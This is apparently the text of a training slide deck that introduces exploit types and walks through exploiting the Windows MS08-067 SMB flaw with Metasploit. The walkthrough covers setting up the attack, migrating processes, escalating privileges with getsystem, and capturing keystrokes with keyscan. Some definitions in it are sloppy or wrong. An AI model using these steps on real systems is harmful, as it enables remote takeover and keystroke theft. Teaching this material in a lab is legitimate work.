You can get tricks of exploitation on window XP. Also get details of types of exploit, introduction of Exploit, CSS, SQL and so on.

1. Uploaded by
Indu Rajawat & Megha Kahndelwal
latest.com.co (Imperial Soft Tech)

2. 1.Introduction
2.Types
3.Exploit Design Goals
4.Exploit Mixins
5.MS08_067_netapi Vulnerability
(an example of exploit mixins)
latest.com.co (Imperial Soft Tech)

3. An exploit is a piece of software of chunk of
data that takes advantage of velnerability or
bug in order to cause unintended or
unanticipated behavior to occur on computer.
latest.com.co (Imperial Soft Tech)

4. 1.Xss(Cross site scripting)
2.Sql injection
3.Clickjacking
4.DDos attack
5.POC attack (Proof of conect)
6.Spoofing

5. Cross-site scripting is a security loophole on a
website that is hard to detect and stop, making
the site vulnerable to attacks from malicious
hackers.
latest.com.co (Imperial Soft Tech)

6. SQL Injection involves entering SQL code into
web forms, eg. login fields, or into the browser
address field, to access and manipulate the
database behind the site, system or application.
latest.com.co (Imperial Soft Tech)

7. clickjacking attacks a fundamental design of
HTML itself. It's pulled off by hiding the target
URL within a specially designed iframe that's
concealed by a decoy page that contains
submission buttons.
latest.com.co (Imperial Soft Tech)

8. A denial of service attack (DOS) is an attack through which a person
can render a system unusable or significantly slow down the system
for legitimate users by overloading the resources, so that no one can
access it.this is not actually hacking a webite but it is used to take
down a website.
If an attacker is unable to gain access to a machine, the attacker most
probably will just crash the machine to accomplish a denial of service
attack,this one of the most used method for website hacking
latest.com.co (Imperial Soft Tech)

9. In computer security the term proof of concept
(proof of concept code or PoC) is often used
as a synonym for a zero-day exploit which,
mainly for its early creation, does not take full
advantage over some vulnerability.
latest.com.co (Imperial Soft Tech)

10. a spoofing attack is a situation in which one
person or program successfully masquerades
as another by falsifying data and thereby
gaining an illegitimate advantage.

11. 1.Design goals should be minimalist.
2.Proof of concepts should be written as
Auxiliary DoS modules, not as exploits.
3.The final exploit reliability must be high.
4.Target lists should be inclusive.
5.exploits should be readable as well.
latest.com.co (Imperial Soft Tech)

12. 1.Exploit::Remote::Tcp
2.Exploit::Remote::DCERPC
3.Exploit::Remote::SMB
4.Exploit::Remote::BruteTargets
latest.com.co (Imperial Soft Tech)

13. This is a remote code execution vulnerability. An attacker
who successfully exploited this vulnerability could take
complete control of an affected system remotely. On
Microsoft Windows 2000-based, Windows XP-based, and
Windows Server 2003-based systems, an attacker could
exploit this vulnerability over RPC without authentication
and
could
run
arbitrary
code.
latest.com.co (Imperial Soft Tech)

14. 1).msfconsole
2).search exploits
3).use exploits/windows/smb/ms08_067_netapi
4).show options
5).set lhost
6).set rhost
7). exploit
8).now go to window xp in command window and type
netstat -ms

16. 9).
10).
11).
12).
13).
14).
15).
16).
17).
ps
migrate (PID)
screenshot
shell
cd documents & settings
cd admin
cd desktop
md folder
exit

17. latest.com.co (Imperial Soft Tech)

18. latest.com.co (Imperial Soft Tech)

19. 18).
19).
20).
21).
help
getsystem
keyscan_start
now go to window xp n open notepad n write
something
22). keyscan_dump
23). keyscan_stop
latest.com.co (Imperial Soft Tech)

20. latest.com.co (Imperial Soft Tech)

21. softtechimperial@gmail.com
latest.com.co (Imperial Soft Tech))